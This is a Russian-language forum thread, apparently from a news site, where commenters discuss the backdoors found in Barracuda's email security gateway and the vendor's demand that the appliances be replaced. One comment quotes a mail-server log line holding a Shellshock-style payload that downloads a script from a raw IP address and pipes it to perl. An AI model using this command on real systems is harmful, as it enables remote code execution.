| 1.1, КО (?), 10:28, 11/06/2023 [ответить] [﹢﹢﹢] [ · · · ]
| +12 +/– |
Комиссия спалила их бэкдор и теперь требуют убрать
| | |
| |
| 2.4, Аноним (4), 10:32, 11/06/2023 [^] [^^] [^^^] [ответить]
| +6 +/– |
Убрать эту компанию из списка поставщиков, бекдор оказалась слишком аппаратным.
| | |
| |
| 3.22, Аноним (22), 12:04, 11/06/2023 [^] [^^] [^^^] [ответить]
| +6 +/– | |
На самом деле это достаточно просто устроить, имхо: если апдейт на фирмвару от хаксора откажется потом грузить фирменнные апдейты, а бутлоадер заменит на свой, отказывающийся шить вендорскую фирмвару... это все не так уж сложно сделать как можно себе представить.
И тут вендор такой - опа! Его выперли с его же девайса. Жытаг осваивайте, там свое всегда отспорить можно :)
| | |
| |
| 4.37, anodymus (?), 14:49, 11/06/2023 [^] [^^] [^^^] [ответить]
| +3 +/– | |
> Жытаг осваивайте, там свое всегда отспорить можно :)
Не всегда. Иногда предохранители выжигаются при записи софта для защиты от аппаратной отладки. Тот же народный STM32, например. И уже не перезальёшь ничего. Только чип перепаивать.
| | |
| |
| 5.114, Аноним (114), 22:47, 12/06/2023 [^] [^^] [^^^] [ответить] | +/– | 1 STM32 F1xx и тому подобные - можно вернуть себе как раз всегда Там лишь 1 ... большой текст свёрнут, показать | | |
|
| 4.83, Аноним (83), 08:00, 12/06/2023 [^] [^^] [^^^] [ответить]
| +/– | |
Intel Boot Guard должен запрещать загрузку вирусных прошивок BIOS/UEFI, а они уже вирусных BootLoader-ов и далее по цепочке верифицированной загрузки.
Это не снимает проблему окерпичивания устройства при заражении.
| | |
|
| 3.72, igaiLie7 (?), 23:44, 11/06/2023 [^] [^^] [^^^] [ответить]
| +/– |
Не смешно, когда собственные устройства работают против вас. Прогресс, а что поделать? Жизнь полна неожиданностей.
| | |
| |
| 4.118, Аноним (114), 22:56, 12/06/2023 [^] [^^] [^^^] [ответить] | +1 +/– | Вы sci-fi когда-нибудь смотрели Перехват инженерных систем более-менее крупных ... большой текст свёрнут, показать | | |
|
|
|
| 1.2, Аноним (4), 10:31, 11/06/2023 [ответить] [﹢﹢﹢] [ · · · ]
| +13 +/– |
Всегда знал что эти аппаратные комплексы по защите чего угодно полная туфта.
| | |
| |
| 2.15, пох. (?), 11:10, 11/06/2023 [^] [^^] [^^^] [ответить]
| –15 +/– | |
Чего это вдруг? Вот жеж, защитили. Прибор защищенный плавким предохранителем успешно защитил предохранитель, расплавившись первым.
Враг не прошел в корпоративную сеть. Правда, пару месяцев теперь сеть без почты, в ожидании rma, но так, наверное, и было задумано?
P.S. дайте угадаю, у ней внутре помимо неонки был lin00ps
| | |
| |
| 3.24, Аноним (4), 12:08, 11/06/2023 [^] [^^] [^^^] [ответить]
| +4 +/– | |
Я к тому зачем вообще этой штуке кроме софта, ещё какая-то своя аппаратная конструкция. Такое конечно делают во всяких аппаратных балансировщиках, для большой нагрузки. Но вот даже там понятно что ты это не сможешь обновиться так просто или научить эту штуку новым трюкам.
Собственно сабж что-то такое и словил что раз уж он такой аппаратный, оптимизированный и на низком уровне обновить его нельзя и защищает он до первого серьёзного инцидента. Был бы это просто обычный ПК с прогой там всё ясно обновился и всё почта под защитой. Ну ок нагрузка у тебя большая поставь два таких или десять. Это я даже не говорю что эту прогу можно поставить туда где вся остальная почта крутится.
| | |
| |
| 4.27, Аноним (27), 12:23, 11/06/2023 [^] [^^] [^^^] [ответить]
| +3 +/– | |
Я думаю, что всё гораздо проще. Перешили биос и поставили флаг защиты от записи в области, где конфиг чипсета хранится. И теперь чипсет не даёт прошить, нужно вынимать чип и в программатор его. Но так как вскрывать корпус категорически запрещено, ибо коммерческая тайна, копирайты и т.д., то будьте добры переслать Корпорации.
Кто скупит устройство задешево на Авито у тех, кто начнёт от них избавляться, и научится перешивать сам, тот неплохо подзаработает.
| | |
| |
| 5.30, пох. (?), 12:38, 11/06/2023 [^] [^^] [^^^] [ответить] | +3 +/– | Еще проще - взяли и отрубили перешивалку Может и ненарочно даже а под rm -f под... большой текст свёрнут, показать | | |
| |
| 6.73, igaiLie7 (?), 23:46, 11/06/2023 [^] [^^] [^^^] [ответить]
| +1 +/– | |
> А вы как всегда свою конспирологию на пустом месте разводите.
Ой, извините, я наверное забыл снять свою конспирологическую шапочку. Буду знать, что нужно быть более скептичным к любым возможным объяснениям и просто принимать все как есть.
> никому не нужны устаревшие стоечные серверы малой мощности.
Вот-вот, кто же захочет купить устаревшие серверы? Особенно если они имеют проблемы с перепрошивкой. Продажа таких устройств на Avito — просто золотая жила для всех, кто хочет заработать деньги. Какой план!
| | |
|
|
| 4.29, пох. (?), 12:35, 11/06/2023 [^] [^^] [^^^] [ответить]
| +1 +/– | |
> Я к тому зачем вообще этой штуке кроме софта, ещё какая-то своя аппаратная конструкция.
ну типа когда компьютеры были большие - это было неплохим вариантом (тот же цискин аплайанс тоже аппаратный изначально, хотя сейчас есть и виртуальные айронпорты)
Ну и сп-ть китайскому конкуренту сложнее.
> Был бы это просто обычный ПК с прогой там всё ясно обновился
в обычном тоже бывают всякие уефи и bmc, в которых тоже может прописываться малварь и вообще хрен выковыряешь. Виртуализация - да, до некоторой степени защищает, но тоже не в этом случае - тут явно старательно копали, а такие могут накопать и дырку из вм в хост, тем более что их регулярно есть.
А аплайанс заменил и дело с концом, так что и в этом плане вариант не худший. Место в стойке - ну жалко, да.
| | |
| |
| 5.63, kusb (?), 22:46, 11/06/2023 [^] [^^] [^^^] [ответить]
| +/– |
А там ещё-что то совсем аппаратное есть, типа Asic? И их нельзя будет задействовать из-за уязвимости? А если использовать аккуратно asic, со знанием дела?
Или почему с новой прошивкой это устройство уже не нужно, хотя раньше было нужно?
| | |
|
|
| 3.45, ivan_erohin (?), 18:02, 11/06/2023 [^] [^^] [^^^] [ответить]
| +1 +/– | |
> Враг не прошел в корпоративную сеть.
почему ? как раз прошел и (будем готовиться к худшему) закрепился там внутри.
железка была использована как плацдарм, можете ее менять, можете не менять -
все равно нужен аудит и зачистка всего вплоть до сетевых принтеров и
контроллеров СКУД-видео-противопожарки.
| | |
| |
| 4.47, Аноним (47), 18:30, 11/06/2023 [^] [^^] [^^^] [ответить]
| +/– |
Хорошая фантазия. На практике же, у этой железки нет доступа в корпоративную сеть. Это почтовый гейт, от которого до ближайшего Exchange минимум один фаерволл и один роутер, а по соседству в том же влане в лучшем случае второй такой же гейт. Да и то не факт, что им друг с другом разрешено общаться. Кроме того, исследования не нашли следов и возможностей для дальнейших эскалаций.
| | |
| |
| 5.54, ivan_erohin (?), 19:56, 11/06/2023 [^] [^^] [^^^] [ответить]
| +1 +/– | |
> до ближайшего Exchange
вы сами все и сказали. никто за язык не тянул.
> минимум один
> фаерволл и один роутер,
фаерволлы, роутеры и вланы не помогают против атак на приложения.
волшебные пакеты, волшебные письма и т.п. проходят через них.
| | |
| |
| 6.57, Аноним (47), 20:18, 11/06/2023 [^] [^^] [^^^] [ответить]
| +/– |
И что изменилось с появлением взломанной Барракуды? Волшебные письма и пакеты получили +30 к волшебству? Эксчендж стал каким-то более уязвимым от того, что ровно те же письма по ровно тому же SMTP получает не напрямую с твоего открытого релея, а от гейта?
| | |
| |
| 7.61, Аноним (61), 22:19, 11/06/2023 [^] [^^] [^^^] [ответить]
| +/– |
С большой вероятностью с той барракуды был открыт доступ к ексченджу и лдап АД.. хорошо если только по минимуму, к нужным портам, а не просто к IP (или, если "повезло", вообще он стоял внутри периметра)...
| | |
| |
| 8.75, Аноним (47), 23:52, 11/06/2023 [^] [^^] [^^^] [ответить] | +1 +/– | Тоже хорошая фантазия, и тоже ближе к фольклору, чем к реальности Компании, кот... текст свёрнут, показать | | |
| 8.79, пох. (?), 00:25, 12/06/2023 [^] [^^] [^^^] [ответить] | +/– | ну так ее для этого ломать не надо было - просто послать письмо А никаких друг... большой текст свёрнут, показать | | |
| |
| 9.81, _ (??), 04:28, 12/06/2023 [^] [^^] [^^^] [ответить] | +/– | Вроде не совсем ду волшебный на голову но всё же - сморозил Выкинут на ЮХ и... текст свёрнут, показать | | |
| |
| 10.89, пох. (?), 11:06, 12/06/2023 [^] [^^] [^^^] [ответить] | +/– | а им дадут Нам, например, afaik, нельзя А кто мог перейти на 365 уже давно вс... большой текст свёрнут, показать | | |
| |
| |
| 12.128, Аноним (114), 10:30, 13/06/2023 [^] [^^] [^^^] [ответить] | –1 +/– | Продакт project манагеры это обычно как раз очень крутые кодеры А то что льви... большой текст свёрнут, показать | | |
|
|
|
|
|
|
|
|
|
|
|
| 1.6, Аноним (6), 10:32, 11/06/2023 [ответить] [﹢﹢﹢] [ · · · ]
| –3 +/– |
Видимо, атака спецслужб. Кто ещё ради этого в прошивку полезет? Чё, бинго сорвали, многие покупатели устройства менять не станут/смогут, а выкинуть устройства в мусор они себе позволить не могут, так и будут юзать вредоносное устройство. Особенно, если они находятся в подсанкционном государстве, или против них введены санкции.
| | |
| |
| 2.8, Бывалый смузихлёб (?), 10:36, 11/06/2023 [^] [^^] [^^^] [ответить]
| +1 +/– |
так американские спецслужбы сделали что хотели, но сторонние хацкеры, пробравшись в их притон, спалили контору и теперь требуется срочно закрыть "внезапно обнаруженную" дыру
| | |
| 2.9, Аноним (9), 10:36, 11/06/2023 [^] [^^] [^^^] [ответить]
| +/– | |
>нескольких видов вредоносного ПО - SALTWATER, SEASPY и SEASIDE
Что, прямо в имплантах их названия записаны? Или специально придуманы, чтобы сделать вид, что это продукция одной организации, любящей давать своим вредоносам и программам слежки названия из одних прописных?
| | |
| |
| 3.26, n00by (ok), 12:11, 11/06/2023 [^] [^^] [^^^] [ответить]
| +/– |
 > Что, прямо в имплантах их названия записаны?
Не знаю, что такое имплант, но в теле зловреда нередко оставляют текстовые строки.
| | |
| |
| 4.28, Аноним (28), 12:25, 11/06/2023 [^] [^^] [^^^] [ответить]
| +1 +/– |
Да, специально, чтобы была для антивируса сигнатура, в авторстве сомнений не было, и чтобы реверсить было проще! Строки если нужны - то их наоборот хешируют.
| | |
| |
| 5.35, n00by (ok), 14:29, 11/06/2023 [^] [^^] [^^^] [ответить]
| +2 +/– |
Что тут обычно, так это качество анонимной экспертизы. По факту Rustock.C был так назван, поскольку содержал в себе путь к имени файла с исходниками.
| | |
|
|
|
| 2.48, Аноним (47), 18:32, 11/06/2023 [^] [^^] [^^^] [ответить]
| +/– |
Не смогут позволить что именно? Коробку скотчем замотать и лейбу на принтере распечатать? Замена за счёт вендора.
| | |
| |
| 3.49, пох. (?), 18:38, 11/06/2023 [^] [^^] [^^^] [ответить]
| +/– |
> Не смогут позволить что именно? Коробку скотчем замотать и лейбу на принтере
> распечатать? Замена за счёт вендора.
о времена, о нравы - еще небось на СВОЕМ принтере?!
Эх... А когда-то малчык прибегал с коробкой в ручонках и торжественно ее нам вручал в обмен на сдохшую... давно енто было, конечно.
| | |
| |
| 4.58, Аноним (47), 20:21, 11/06/2023 [^] [^^] [^^^] [ответить]
| +/– |
Мальчик с тех пор подрос, и работает в UPS. Но таки да, печатать приходится на своём принтере.
| | |
|
|
| 2.69, Tron is Whistling (?), 23:06, 11/06/2023 [^] [^^] [^^^] [ответить]
| +/– |
Почему не станут-то? Нам вообще заменили мегаоперативно - мы обратились в первый день оповещений, через два дня получили пачку железок.
| | |
| 2.102, Аноним (47), 16:44, 12/06/2023 [^] [^^] [^^^] [ответить]
| +/– | |
> Видимо, атака спецслужб. Кто ещё ради этого в прошивку полезет?
Ради чего «этого»? Ради сбора всей корреспонденции бизнеса? Ну даже не знаю, кому это может быть интересно, кроме таинственных спецслужб. Наверное… Всем кто обретается в этом бизнесе? От биржевых спекулянтов до конкурентов и контрагетов? Да нет, бред какой-то. Конечно же это спецслужбы, следят с целью слежки. От внутренней непримиримой злобы.
| | |
| 2.119, Аноним (114), 23:02, 12/06/2023 [^] [^^] [^^^] [ответить] | +/– | Ну вон автор MIRAI не был спецслужбами Зато собрал ботнет в 300К ботов в момент... большой текст свёрнут, показать | | |
|
| 1.10, YetAnotherOnanym (ok), 10:36, 11/06/2023 [ответить] [﹢﹢﹢] [ · · · ]
| +11 +/– |
 > ESG представляет собой аппаратно-программный комплекс для защиты электронной почты предприятий от атак, спама и вирусов.
Причиной пожара стало возгорание противопожарной системы.
> при выполнении кода через Perl-оператор "qx"
Классика жанра. Уж сколько раз твердили миру, что дёргать утилиты в дочернем шелле - ещё больший моветон, чем использовать goto.
| | |
| |
| 2.40, Ivan_83 (ok), 15:52, 11/06/2023 [^] [^^] [^^^] [ответить]
| +/– |
 goto ничем не плох, проме того что в кривых руках он ломает читабельность.
В правильных он наоборот читабельность повышает и упрощает логику.
| | |
| |
| 3.53, Аноним (53), 19:27, 11/06/2023 [^] [^^] [^^^] [ответить]
| +6 +/– |
Классика жанра:
* Код мой -> упрощение логики и повышенная читабельность
* Код чужой -> кривые руки и поломанная читабельность
| | |
| |
| 4.64, Ivan_83 (ok), 22:55, 11/06/2023 [^] [^^] [^^^] [ответить]
| +1 +/– |
Вовсе нет.
Я долго избегал goto у себя в коде, пока не увидел его в исходниках ядра FreeBSD, и там оно реально сильно упрощало логику и повышало читабельность.
Сам часто использую для того чтобы вывалится в тот кусок функции который обрабатывает ошибку и освобождает ресурсы перед возвратом кода ошибки.
Очень редко для retry.
| | |
| |
| 5.78, Аноним (53), 00:13, 12/06/2023 [^] [^^] [^^^] [ответить]
| –2 +/– | |
> использую для того чтобы вывалится в тот кусок функции который обрабатывает ошибку и освобождает ресурсы
Ну вот это как раз потому, что у вас в коде типичная сишная императивная лапша, где в одной функции вместе с логикой намешаны и аллокация, и освобождение, и обработка ошибок.
| | |
|
|
|
| 2.55, Liin (ok), 20:03, 11/06/2023 [^] [^^] [^^^] [ответить]
| +/– |
 > дёргать утилиты в дочернем шелле - ещё больший моветон, чем использовать goto
Ну как бы нет. Это за использование qx для запуска шела на бить по рукам. Это означает, что разраб вообще не понимал, что делает. Если там такой уровень разработки - все эти железки нужно срочно отключать и убирать на полку.
| | |
| 2.88, Аноним (88), 10:57, 12/06/2023 [^] [^^] [^^^] [ответить]
| +2 +/– | |
В программировании не бывает жёстких законов - только указания.
GOTO удобен для описания конечных автоматов.
Синглтоны - это норма: большинство классов нужно только в одном экземпляре. Делать синглтоны через грязный хак в конструкторе - обычно боком выходит, через DI - хорошо.
В глобальной переменной удобно хранить логгер.
Протектед методы нужно покрывать юнит-тестами если пишешь фреймворк.
Внешние ключи не используются в больших БД с шардингом.
Если это облегчает восприятние кода, то можно его хоть в два столбика писать, называть переменные a1, a2, a3, и мешать snake_case с CamelCase и lowerCamelCase.
И таких примеров - миллионы. Всегда нужно думать своей головой.
| | |
| |
| 3.126, Аноним (114), 10:16, 13/06/2023 [^] [^^] [^^^] [ответить] | +1 +/– | Проблема в том что он удобен еще и для прострела пяток не сильно очевидными спос... большой текст свёрнут, показать | | |
|
|
| 1.21, n00by (ok), 12:03, 11/06/2023 [ответить] [﹢﹢﹢] [ · · · ]
| –1 +/– |
> Бэкдор SALTWATER был оформлен в виде модуля mod_udp.so
> к SMTP-процессу bsmtpd
LD_PRELOAD?
Зато место на диске сэкономили!
| | |
| 1.23, Аноним (22), 12:08, 11/06/2023 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
Email InSecurity gateway однако получился. Ну, что, кто еще из безопасников хочет нанять дешевых раджей разбирающихся в иб как свиньи в апельсинах? :)
| | |
| |
| 2.25, Аноним (4), 12:10, 11/06/2023 [^] [^^] [^^^] [ответить]
| +/– |
Что теперь эту компанию оштрафуют на жесткие 60 000 рублей? Да пофиг можно не то что нанять дешевых, а вообще всех разогнать ничего не изменится.
| | |
|
| |
| 2.34, Атон (?), 13:59, 11/06/2023 [^] [^^] [^^^] [ответить]
| +/– |
Какой же это энтерпрайз? это молодая динамично развивающаяся компания, а 5 прошивку, с которой все началось, делали вообще тиктокеры на удаленке.
| | |
| |
| 3.41, Самый Лучший Гусь (?), 16:03, 11/06/2023 [^] [^^] [^^^] [ответить]
| +3 +/– |
> Какой же это энтерпрайз? это молодая динамично развивающаяся компания, а 5 прошивку,
> с которой все началось, делали вообще тиктокеры на удаленке.
У них в подвале:
> © 2003 - 2023 Barracuda Networks, Inc.
Уже весьма немолодая. Хардварный шлюз для электронной почты это не может быть не энтерпрайз. Нормальному человеку такое даже в голову не прийдёт.
| | |
| |
| 4.44, Атон (?), 17:35, 11/06/2023 [^] [^^] [^^^] [ответить]
| –2 +/– |
>> Какой же это энтерпрайз? это молодая динамично развивающаяся компания, а 5 прошивку,
>> с которой все началось, делали вообще тиктокеры на удаленке.
> У них в подвале:
>> © 2003 - 2023 Barracuda Networks, Inc.
> Уже весьма немолодая. Хардварный шлюз для электронной почты это не может быть
> не энтерпрайз. Нормальному человеку такое даже в голову не прийдёт.
Не фирма-однодевка, но молодая.
5 версия вышла в 2017. 9 в 2023. грубо говоря, до 2011 этот стартап искал инвесторов и не функционировал.
тарифные планы у них начинаются с 100 ящиков, это SMB сегмент.
кровавый энтерпрайз начинается от 50 лет и сумм на 2 порядка выше.
| | |
| |
| 5.46, пох. (?), 18:15, 11/06/2023 [^] [^^] [^^^] [ответить]
| +/– | |
Ну щассс... сколько там лет ironport до покупки его циской?
Изобрели идею, успешно провернули, набрали на ipo, собрали бабла, продали подорого... Правда, в отличие от этих, они не кламав (или что там?) использовали, конечно.
Унутре, кстати, фря. (Ну и неонка, етосамое.)
И ничего, лавки из top50 юзают... куда им деваться-то с подводной лодки.
| | |
| |
| 6.50, Атон (?), 19:03, 11/06/2023 [^] [^^] [^^^] [ответить]
| +/– | |
> Ну щассс... сколько там лет ironport до покупки его циской?
это им очень совпало с периодом когда у эффективных менеджеров возникла мода скупать стартапы а не пилить свои велосипеды с нуля.
> И ничего, лавки из top50 юзают... куда им деваться-то с подводной лодки.
маркетинг циски может зимой продать чукчам снег. а уж незаметно впарить клиентам пакетом "на сдачу" от годовой подписки при очередном обновлении линейки еще один продукт.
| | |
| 6.51, Атон (?), 19:10, 11/06/2023 [^] [^^] [^^^] [ответить]
| +/– |
> Ну щассс... сколько там лет ironport до покупки его циской?
> Изобрели идею, успешно провернули, набрали на ipo, собрали бабла, продали подорого... Правда,
> в отличие от этих, они не кламав (или что там?) использовали,
> конечно.
а зачем циска поглощала ClamAV и Snort
| | |
| |
| 7.77, пох. (?), 00:13, 12/06/2023 [^] [^^] [^^^] [ответить] | +/– | да хз - может избавлялась от неконтролируемых конкурентов, может назло врагам, а... большой текст свёрнут, показать | | |
| |
| 8.82, _ (??), 04:50, 12/06/2023 [^] [^^] [^^^] [ответить] | +/– | Повторяю большими красными буквами, что Barrakuda что IronPort - личензировали а... текст свёрнут, показать | | |
| |
| 9.85, пох. (?), 08:27, 12/06/2023 [^] [^^] [^^^] [ответить] | +/– | вот, была бы непыльная работенка на всю жизнь, переписывать с пистона на пистон ... текст свёрнут, показать | | |
|
|
|
|
|
|
|
|
| |
| 2.36, Анонимус другой (?), 14:36, 11/06/2023 [^] [^^] [^^^] [ответить]
| +/– | |
>Проблема была вызвана отсутствием должной проверки имён файлов внутри tar-архивов, передаваемых в почтовом вложении, и позволяла выполнить произвольную команду в системе с повышенными привилегиями, обойдя экранирование при выполнении кода через Perl-оператор "qx".
Вероятнее всего связка ClamAV + SpamAssassin
| | |
|
| 1.39, Аноним (39), 15:27, 11/06/2023 [ответить] [﹢﹢﹢] [ · · · ]
| +1 +/– | |
Jun 11 12:54:23 mg16 postfix/smtpd[10418]: warning: Illegal address syntax from serv1.jokeroo.com[104.200.159.174] in MAIL command: <() { :; }; wget -qO - 68.235.39.225/ipax|perl>
нашел в логах эксплоит :)
| | |
| |
| 2.122, Аноним (114), 23:21, 12/06/2023 [^] [^^] [^^^] [ответить]
| +/– |
А что это вообще за дуршлаг?
Например 68.235.39.225/e/ работает и вываливает какой-то забавный хлам.
| | |
|
| 1.52, Аноним (52), 19:17, 11/06/2023 [ответить] [﹢﹢﹢] [ · · · ]
| +2 +/– |
Вот что бывает когда АНБ США набирает себе сотрудников для баланса гендерной нейтральности. Страдает профессионализм структуры. А былые времена уязвимость замаскировали бы так что лет 20 не нашли.
| | |
| 1.56, Liin (ok), 20:08, 11/06/2023 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
То, что они не могут пофиксить прошивку без замены устройства - это прям мегафакап для всей их архитектуры. CTO с командой можно гнать ссаными тряпками без выходного пособия. Так-то баги у всех бывают, но если ты не можешь пофиксить это без гемора для клиента - не надо тебе заниматься этим делом, выбери другую профессию.
| | |
| |
| 2.59, Аноним (20), 20:57, 11/06/2023 [^] [^^] [^^^] [ответить]
| +/– |
CTO - это профессия грести деньги, а не менять прошивки. Вот ты его прогнал в другую отрасль, он пойдёт и тоже там зафакапит, увеличив личный счёт на пару лямов. В третий раз придёт воспитывать твоих детей, он же умеет.
| | |
| 2.67, Tron is Whistling (?), 23:04, 11/06/2023 [^] [^^] [^^^] [ответить]
| +/– |
Ды почему факап. Есть base OS, есть набор пакетов собственно аппликухи - "фирмварь". Base OS удалённо если и обновляется, то очень ограниченно. Дальше - как ты будешь чинить порутованную операционку удалённо? Она тебе этого может просто не дать сделать. Трахаться с IPMI и заливкой здоровенного образа через VCD/VUSB - это очень долго, проще выслать новую железку. Ну и да, где гарантии, что руткит собственно в фирмварь платы не залез, с утечками всяких интелоключей тоже не исключено. Лучше таки заменить целиком.
| | |
| |
| |
| 4.90, пох. (?), 11:11, 12/06/2023 [^] [^^] [^^^] [ответить]
| +/– |
> // IPMI для тяжёлых случаев у них есть, кстате, но, видимо, решили
> геморроев на ровном месте не разводить
у них может и установочного образа-то не быть, нафига он нужен, чтоб потырили и своих хакокуд наплодили? Разливают поди все дискдупликатором каким еще до монтажа в коробку.
А если и есть образ, то под десятью замками. А то каждый так сможет.
| | |
| |
| 5.104, Tron is Whistling (?), 17:57, 12/06/2023 [^] [^^] [^^^] [ответить]
| +/– |
Деплойный образ-то скорее всего есть, особенно с учётом того, что у них даже виртуалки мать-мать чем-то внутри отличаются, download для каждого клиента свой.
| | |
|
|
| 3.74, Liin (ok), 23:50, 11/06/2023 [^] [^^] [^^^] [ответить]
| +/– |
> Дальше - как ты будешь чинить порутованную операционку удалённо? Она тебе этого
> может просто не дать сделать.
Ну мил человек, чай не в 20-м веке-то живем. Полно технологий и подходов уже известно, тот же Dual BIOS. А вообще в Баракуде прям просится Hardened Linux, со всеми плюшками - политиками доступа, изоляцией процессов, файловых систем, уровнями доступа и прочие сладостные для уха безопасника слова.
| | |
| |
| 4.91, пох. (?), 11:15, 12/06/2023 [^] [^^] [^^^] [ответить]
| +/– |
> Ну мил человек, чай не в 20-м веке-то живем. Полно технологий и
> подходов уже известно, тот же Dual BIOS. А вообще в Баракуде
нет гарантии что он не dual pwned, нужно об этом думать на этапе проектирования, выбирать плату с поддержкой и потом бороться с производителем решившим именно ее снять потому что перестали выпускать вооон тот мелкий преобразователь напряжений который так здорово лег в схему.
Зачем закладываться на такие жуткие факапы как этот? Слуцилась? Ну поменяли коробки, и клиенту так спокойней (все равно они наверняка на саппорт контракте с заменой 5/7/24). Заодно убедиться что ничего не забыли и помимо трех троянцев нет четвертого еще через какую-то интересную технологическую отверстию.
| | |
| |
| 5.93, Liin (ok), 12:12, 12/06/2023 [^] [^^] [^^^] [ответить]
| +/– | |
> Ну поменяли коробки
А-ха-ха, "поменяли коробки". Поменять коробки можно для кошки. А замена инфраструктурных элементов крупной компании - это отдельный геморой для всего IT-отдела. И вряд ли эту Баракуду будут еще закупать. Никому геморой не нравится, знаете ли..
| | |
| |
| 6.94, Поле Name не забыто и не прощено (?), 14:11, 12/06/2023 [^] [^^] [^^^] [ответить]
| +/– |
В чём проблема замены-то? Одну железку почистить и снять, одну поставить и включить в кластер.
Делов ровно на час. Если железок несколько и кластер большой - можно за этот же час десяток-другой убрать-добавить, всё упирается только в скорость прокликивания :D
| | |
| |
| 7.97, Liin (ok), 14:17, 12/06/2023 [^] [^^] [^^^] [ответить]
| +/– |
> В чём проблема замены-то? Одну железку почистить и снять, одну поставить и
> включить в кластер.
Что значит - "одну"? У вас все железки скомпроментированы. Их надо разом все выключать и заново конфигурить.
| | |
| |
| |
| 9.111, Liin (ok), 19:41, 12/06/2023 [^] [^^] [^^^] [ответить] | +/– | Я так понимаю, что основы безопасности сетей и серверов Вам не очень хорошо знак... текст свёрнут, показать | | |
|
|
|
| 6.107, пох. (?), 19:01, 12/06/2023 [^] [^^] [^^^] [ответить]
| +/– | |
обычная работа. Еще и по некритичному сервису, пол-часа без почты или резервным релеем где-то в щебенях поднятым специально для этой цели почти любая контора может пережить.
А если для вас это страшный и ужасный геморрой, одну коробку из стойки выкинуть, другую закатать и, может быть, накатить конфиг если кластер уже не кластер а рассадник троянов (надеюсь конфиг у вас все же где-то был) - можете в пресейлы подаваться. Потому что начальство скоро кое о чем догадается.
| | |
|
|
|
|
|
| 1.62, Аноним (62), 22:39, 11/06/2023 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
А могли поставить съемный spi чип в дипоском корпусе в распаянную на плате кроватку установить.
| | |
| |
| 2.66, Tron is Whistling (?), 23:01, 11/06/2023 [^] [^^] [^^^] [ответить]
| +/– |
Какой блджад SPI чип. Какая кроватка. Там обычный x86 внутри. С SSD/HDD и поэтессами.
А кровати переставлять вообще поздно в этом случае.
Меняют потому, что степень внедрения не понятна, а фирмварь полного образа ОС из себя не представляет.
| | |
| |
| 3.76, Аноним (76), 23:59, 11/06/2023 [^] [^^] [^^^] [ответить]
| +/– | |
>фирмварь полного образа ОС из себя не представляет.
Чего она не представляет?
Если там обычный hdd/ssd, пройтись по ним обычным dd, залив образ, который предоставит контора. Нет, для тех у кого лапки, можно и прислать устройства вендору, как элемент маркетинга ход стандарте, хорош и понятен.
Я уж подумал, там всё серьёзно, что-то на уровне пробоин efi.
| | |
| |
| |
| 5.137, Аноним (137), 00:16, 15/06/2023 [^] [^^] [^^^] [ответить]
| +/– |
Тоже мне бентли нашлась, лол.
ПС: почистил и промыл карб шахи - и пошёл резать пятаки и давать угла.
| | |
|
| 4.100, Tron is Whistling (?), 15:05, 12/06/2023 [^] [^^] [^^^] [ответить]
| +/– |
Ну там реально чего угодно может быть после порутания.
Но обычным dd по ним никак не пройтись, железка вендорская, консоли нет.
| | |
|
|
| 2.103, Аноним (47), 17:03, 12/06/2023 [^] [^^] [^^^] [ответить]
| –1 +/– |
Зачем? Дополнительные компоненты, кастомное железо, необходимость вскрывать корпус для замены, ESD-защита, квалификация персонала, и, главное, время. Раз уж апплаенс надо из стойки вынимать, то проще новый туда вставить, чем SPI отвёрткой из кроватки выковыривать. UPS доставит новую железку в течение 24 часов. Через 48 часов твой ещё чуть тёплый рутованный гейт будет у вендора в лаборатории на стенде ждать инженеров для анализа. А через пару месяцев может даже будет стоять в другой стойке у другого клиента после перепрошивки.
| | |
|
| 1.84, Аноним (84), 08:18, 12/06/2023 [ответить] [﹢﹢﹢] [ · · · ] | +/– | Email Security Gateway Это файрвол отдельно для почтового сервера, а не для вс... большой текст свёрнут, показать | | |
| |
| 2.92, пох. (?), 11:17, 12/06/2023 [^] [^^] [^^^] [ответить]
| +/– |
> решение "to obtain a new ESG virtual or hardware appliance."
> Ну хоть если у кого этот файрвол для почтовика крутится на виртуалке,
> то "всего лишь" переустановить и настроить по-новой виртуалку, а не менять
бэкапы конфига, извиняюсь за грубость, делать не принято? Ну пусть настроят, наверняка услуги настройщика тоже входят в саппорт. А контора недельку посидит без почты... зачем она...
> железку. (про версии для AWS/Azure барракуды молчат)
так пусть amazon переустанавливает, для того и брали ведь
| | |
| |
| |
| 4.109, пох. (?), 19:07, 12/06/2023 [^] [^^] [^^^] [ответить]
| +/– | |
> Ды там кластеринг есть, 99% конфига синхронизируются.
ну фиг знает, стоит ли синхронизироваться с зараженным кластером, но в целом тоже не должно быть особой проблемы восстановить конфиг первой из железок а остальное уже в спокойном режиме поштучно синхронизировать.
Ну а кто не может или не имел бэкапов конфигурации - того и не очень жаль.
| | |
| |
| 5.113, Tron is Whistling (?), 22:46, 12/06/2023 [^] [^^] [^^^] [ответить]
| +/– |
Не, синхронизироваться можно с новой машиной, образующей новый кластер. Процесс поднятия понимаемо ускоряется :)
| | |
|
|
| 3.106, Аноним (84), 18:58, 12/06/2023 [^] [^^] [^^^] [ответить] | +/– | ты вообще не понял масштаб кабздеца Заражается ESG через бэкдор, подгружаются л... большой текст свёрнут, показать | | |
| |
| 4.108, пох. (?), 19:05, 12/06/2023 [^] [^^] [^^^] [ответить]
| +/– |
> ты вообще не понял масштаб кабздеца. Заражается ESG через бэкдор, подгружаются левые
> демоны SMTP, от EGS заражается почтовый сервак, который ESG по-идее защищает,
если у тебя почтовый сервер может чем-то там заразиться от совершенно несовместимой железки - тебе уже не надо так много работать, сходи проветрись.
> и понеслось заражение через email всех кто в базе почтовика.
чем заражение? В базе почтовика обычные пользователи, у них нет "qx"
> И тут вопрос, а КАК понять вообще КОГДА произошло заражение, т.е. какие
> бэкапы можнно спокойно накатывать на все?
бэкапы - чего? Бэкапы конфига можешь любые накатывать - это, чорд побери - КОНФИГ.
> Так можно и работу потерять.
да, с твоими талантами - легко.
| | |
| |
| 5.110, Аноним (84), 19:13, 12/06/2023 [^] [^^] [^^^] [ответить]
| +/– |
выше я отметил про SMTP из ориг.статьи. А то "несовм.железка" и пошло-поехало домысливание.
"тебе уже не надо так много работать, сходи проветрись" - пошло советское хамство, переход на личности.
пох такой пох, разговор закончен.
| | |
| 5.125, pofigist (?), 09:56, 13/06/2023 [^] [^^] [^^^] [ответить]
| +/– |
На счет конфигов - в современные конфиги некоторые умники очень любят встраивать поддержку скриптовых языков. То есть по факту мы имеем вместо старого, доброго тупого конфига - некий скрипт на sh/lua/PHP/etc...
